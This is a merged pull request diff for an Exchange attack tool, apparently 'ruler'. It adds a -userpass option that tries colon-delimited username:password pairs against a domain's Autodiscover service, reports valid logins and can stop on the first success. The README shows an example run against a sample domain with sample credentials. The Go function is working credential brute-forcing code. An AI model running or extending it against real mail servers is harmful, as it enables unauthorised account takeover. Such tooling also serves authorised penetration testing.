Merge pull request #8 from porterhau5/master

userpass brute-forcing option

README.md

@@ -84,6 +84,22 @@ You should see your brute-force in action:
 [x] Failed: henry.hammond:Eish
 ```
 
+Alternatively, you can specify a userpass file with the ```-userpass``` option. The userpass file should be colon-delimited with one pair of credentials per line:
+
+```
+$ cat userpass.txt
+john.ford:August2016
+henry.hammond:Password!2016
+cindy.baker:Password1
+
+./ruler -domain evilcorp.ninja -brute -userpass userpass.txt -v -insecure
+
+[*] Starting bruteforce
+[+] Success: john.ford:August2016
+[x] Failed: henry.hammond:Password!2016
+[+] Success: cindy.baker:Password1
+```
+
 There are a few other flags that work with ```-brute```
 These are:
 * -stop _//stop on the first valid username:password combo_

autodiscover/brute.go

@@ -140,6 +140,63 @@ func BruteForce(domain, usersFile, passwordsFile string, basic, insecure, stopSu
 	}
 }
 
+func UserPassBruteForce(domain, userpassFile string, basic, insecure, stopSuccess, verbose bool, consc, delay int) {
+	fmt.Println("[*] Trying to Autodiscover domain")
+	autodiscoverURL := autodiscoverDomain(domain)
+
+	if autodiscoverURL == "" {
+		return
+	}
+	userpass := readFile(userpassFile)
+	if userpass == nil {
+		return
+	}
+
+	result := make(chan Result)
+	count := 0
+
+	for _, up := range userpass {
+		count++
+		if up == "" {
+			continue
+		}
+		// verify colon-delimited username:password format
+		s := strings.SplitN(up, ":", 2)
+		if len(s) < 2 {
+			fmt.Printf("[!] Skipping improperly formatted entry in %s:%d\n", userpassFile, count)
+			continue
+		}
+		u, p := s[0], s[1]
+		count = 0
+
+		//skip blank username
+		if u == "" {
+			continue
+		}
+
+		go func(u string, p string) {
+			out := connect(autodiscoverURL, u, p, basic, insecure)
+			result <- out
+		}(u, p)
+
+		select {
+		case res := <-result:
+			if verbose == true && res.Status != 200 {
+				fmt.Printf("[x] Failed: %s:%s\n", res.Username, res.Password)
+				if res.Error != nil {
+					fmt.Printf("[x] An error occured in connection - %s\n", res.Error)
+				}
+			}
+			if res.Status == 200 {
+				fmt.Printf("\033[96m[+] Success: %s:%s\033[0m\n", res.Username, res.Password)
+			}
+			if stopSuccess == true && res.Status == 200 {
+				return
+			}
+		}
+	}
+}
+
 func readFile(filename string) []string {
 	var outputs []string
 

ruler.go

@@ -101,6 +101,7 @@ func main() {
 	stopSuccessPtr := flag.Bool("stop", false, "Stop on successfully finding a username/password")
 	userList := flag.String("usernames", "", "Filename for a List of usernames")
 	passList := flag.String("passwords", "", "Filename for a List of passwords")
+	userpassList := flag.String("userpass", "", "Filename for a List of username:password combinations separated by a colon, one pair per line")
 	verbosePtr := flag.Bool("v", false, "Be verbose, show failures")
 	conscPtr := flag.Int("attempts", 2, "Number of attempts before delay")
 	delayPtr := flag.Int("delay", 5, "Delay between attempts")
@@ -115,8 +116,13 @@ func main() {
 
 	if *brutePtr == true {
 		fmt.Println("[*] Starting bruteforce")
-		autodiscover.BruteForce(*domainPtr, *userList, *passList, *basicPtr, *insecurePtr, *stopSuccessPtr, *verbosePtr, *conscPtr, *delayPtr)
-		return
+		if *userpassList == "" {
+			autodiscover.BruteForce(*domainPtr, *userList, *passList, *basicPtr, *insecurePtr, *stopSuccessPtr, *verbosePtr, *conscPtr, *delayPtr)
+			return
+		} else {
+			autodiscover.UserPassBruteForce(*domainPtr, *userpassList, *basicPtr, *insecurePtr, *stopSuccessPtr, *verbosePtr, *conscPtr, *delayPtr)
+			return
+		}
 	}
 
 	config.Domain = *domainPtr